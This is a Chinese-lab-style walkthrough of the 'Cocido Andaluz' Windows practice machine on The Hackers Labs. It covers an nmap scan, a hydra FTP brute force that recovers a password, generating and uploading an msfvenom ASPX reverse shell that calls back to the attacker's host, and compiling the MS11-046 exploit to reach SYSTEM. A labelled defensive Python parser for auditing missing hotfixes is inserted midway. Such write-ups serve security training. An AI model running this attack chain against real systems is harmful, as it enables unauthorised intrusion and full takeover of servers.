Lab: The Hackers Labs
URL: https://thehackerslabs.com/cocido-andaluz/
System: Windows
Content: MS11-046
This one is on the easy side; here is a record of the basic steps.
Port scan: FTP, SMB and HTTP are open.
~/D/c $cat port.log
# Nmap 7.94SVN scan initiated Sun Nov 24 08:25:40 2024 as: /usr/lib/nmap/nmap --privileged -sV -sC -Pn -p- -oN port.log 192.168.56.168
Nmap scan report for 192.168.56.168
Host is up (0.00048s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
80/tcp open http Microsoft IIS httpd 7.0
|_http-server-header: Microsoft-IIS/7.0
|_http-title: Apache2 Debian Default Page: It works
| http-methods:
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:E6:7E:04 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN-JG67MIHZH2X, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:e6:7e:04 (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-11-24T14:43:27
|_ start_date: 2024-11-24T14:38:15
| smb2-security-mode:
| 2:0:2:
|_ Message signing enabled but not required
|_clock-skew: 6h13m25s
Nothing turns up on port 80, no directories or files. Following the hint, go straight to brute-forcing FTP. (This part is poorly designed: brute-forcing right out of the gate.)
~/D/c $hydra -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt ftp://$IP
[21][ftp] host: 192.168.56.168 login: info password: PolniyPizdec0211
Logging in over FTP lands in the web root.
~/D/c $ftp ftp://info:PolniyPizdec0211@$IP
Connected to 192.168.56.168.
220 Microsoft FTP Service
331 Password required for info.
230 User info logged in.
Remote system type is Windows_NT.
200 Type set to I.
ftp> ls -la
227 Entering Passive Mode (192,168,56,168,192,7).
125 Data connection already open; Transfer starting.
dr--r--r-- 1 owner group 0 Jun 14 17:12 aspnet_client
-rwxrwxrwx 1 owner group 11069 Jun 15 16:39 index.html
-rwxrwxrwx 1 owner group 184946 Jun 14 16:48 welcome.png
Generate an ASPX reverse shell.
~/D/c $msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1234 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of aspx file: 2709 bytes
Upload the shell over FTP.
ftp> put shell.aspx
local: shell.aspx remote: shell.aspx
227 Entering Passive Mode (192,168,56,168,192,15).
125 Data connection already open; Transfer starting.
100% |******************************************| 2709 47.84 MiB/s 00:00 ETA
226 Transfer complete.
2709 bytes sent in 00:00 (63.86 KiB/s)
Requesting the uploaded shell.aspx gives a shell.
~/D/c $rlwrap nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.168] 49173
Microsoft Windows [Versión 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. Reservados todos los derechos.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\servicio de red
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
INFORMACIÓN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripción Estado
============================= ================================================= =============
SeAssignPrimaryTokenPrivilege Reemplazar un símbolo (token) de nivel de proceso Deshabilitado
SeIncreaseQuotaPrivilege Ajustar las cuotas de la memoria para un proceso Deshabilitado
SeAuditPrivilege Generar auditorías de seguridad Deshabilitado
SeChangeNotifyPrivilege Omitir comprobación de recorrido Habilitada
SeImpersonatePrivilege Suplantar a un cliente tras la autenticación Habilitada
SeCreateGlobalPrivilege Crear objetos globales Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Deshabilitado
SeImpersonatePrivilege is present, but the few potato exploits I tried are all 64-bit builds. This machine is fairly old, so try a different route: download Windows Exploit Suggester from https://github.com/bitsadmin/wesng.
Collect system information on the target and save it to a file.
c:\inetpub\wwwroot>systeminfo
systeminfo
Nombre de host: WIN-JG67MIHZH2X
Nombre del sistema operativo: Microsoft Windows Server 2008 Datacenter
Versión del sistema operativo: 6.0.6001 Service Pack 1 Compilación 6001
Fabricante del sistema operativo: Microsoft Corporation
Configuración del sistema operativo: Servidor independiente
Tipo de compilacin del sistema operativo: Multiprocessor Free
Propiedad de: Usuario de Windows
...
Look up privilege-escalation candidates from the system information.
~/D/c $python3 /opt/WindowsExploitSuggester/wes.py -e info.txt -i "Elevation of Privilege"
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2008 for 32-bit Systems
- Generation: 2008
- Build: 6001
- Version: None
- Architecture: 32-bit
- Installed hotfixes: None
[+] Loading definitions
- Creation date of definitions: 20241123
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20110614
CVE: CVE-2011-1249
KB: KB2503665
Title: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/40564/
Date: 20090414
CVE: CVE-2008-1436
KB: KB952004
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705
Date: 20090414
CVE: CVE-2008-1436
KB: KB956572
Title: Vulnerabilities in Windows Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploit: https://www.exploit-db.com/exploits/6705
Date: 20110208
CVE: CVE-2010-4398
KB: KB2393802
Title: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege
Affected product: Windows Server 2008 for 32-bit Systems
Affected component:
Severity: Important
Impact: Elevation of Privilege
Exploits: http://isc.sans.edu/diary.html?storyid=9988, http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/, http://www.exploit-db.com/exploits/15609/
[-] Missing patches: 4
- KB2503665: patches 1 vulnerability
- KB952004: patches 1 vulnerability
- KB956572: patches 1 vulnerability
- KB2393802: patches 1 vulnerability
[I] KB with the most recent release date
- ID: KB2503665
- Release date: 20110614
[+] Done. Displaying 4 of the 208 vulnerabilities found.
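As an added example (not from this write-up or from wesng), a small parser that does the first step wes.py performs above: it reads systeminfo output in English or in the Spanish the box printed, and turns it into the two patch-hygiene findings a defender would raise here, no hotfixes installed and a Windows 6.0 build that is out of support. The English sample host, its labels other than those shown on the page, and the KB numbers are constructed.

```python
import re

# systeminfo labels, English plus the Spanish ones the box printed. The version
# line is matched on its value (N.N.NNNN), so a label with a lost accent still parses.
LABELS = {"host": ("Host Name", "Nombre de host"),
          "os": ("OS Name", "Nombre del sistema operativo")}
VERSION_RE = re.compile(r"^(\d+\.\d+\.\d+)\b")
KB_RE = re.compile(r"\[\d+\]:\s*(KB\d+)")  # "[01]: KB1234567" in every locale

def parse_systeminfo(text):
    """Return host, OS name, version and the list of installed KBs."""
    info = {"host": None, "os": None, "version": None}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        if not sep:
            continue
        label, value = label.strip(), value.strip()
        for key, names in LABELS.items():
            if label in names:
                info[key] = value
        m = VERSION_RE.match(value)
        if m and info["version"] is None:  # first N.N.NNNN value is the OS version
            info["version"] = m.group(1)
    info["hotfixes"] = KB_RE.findall(text)
    return info

def audit(info):
    """Patch-hygiene findings a defender would raise from the parsed summary."""
    findings = []
    if not info["hotfixes"]:
        findings.append("no hotfixes installed")
    if info["version"] and info["version"].startswith("6.0."):
        findings.append("Windows 6.0 (Vista / Server 2008) is out of support")
    return findings

# Constructed samples: the Spanish lines shown in the write-up (no hotfixes)
# and an English host with two made-up KB numbers for the general case.
SAMPLE_ES = """\
Nombre de host:                   WIN-JG67MIHZH2X
Nombre del sistema operativo:     Microsoft Windows Server 2008 Datacenter
Versión del sistema operativo:    6.0.6001 Service Pack 1 Compilación 6001
"""
SAMPLE_EN = """\
Host Name:                 SRV01
OS Name:                   Microsoft Windows Server 2019 Standard
OS Version:                10.0.17763 N/A Build 17763
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB9990001
                           [02]: KB9990002
"""
```

Run `audit(parse_systeminfo(open("info.txt").read()))` on a real capture; an empty hotfix list on a 6.0.x host is exactly the state wes.py reported above.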
The first suggestion is MS11-046, and Kali ships the exploit code.
~/D/c $searchsploit MS11-046
------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------ ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege E | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS1 | windows/dos/18755.c
Compile it on Linux into a 32-bit Windows executable.
~/D/c $i686-w64-mingw32-gcc 40564.c -o pwn.exe -lws2_32
Upload it over FTP and run it from the shell: root (SYSTEM) obtained.
c:\inetpub\wwwroot>.\pwn.exe
.\pwn.exe
c:\Windows\System32>whoami
whoami
nt authority\system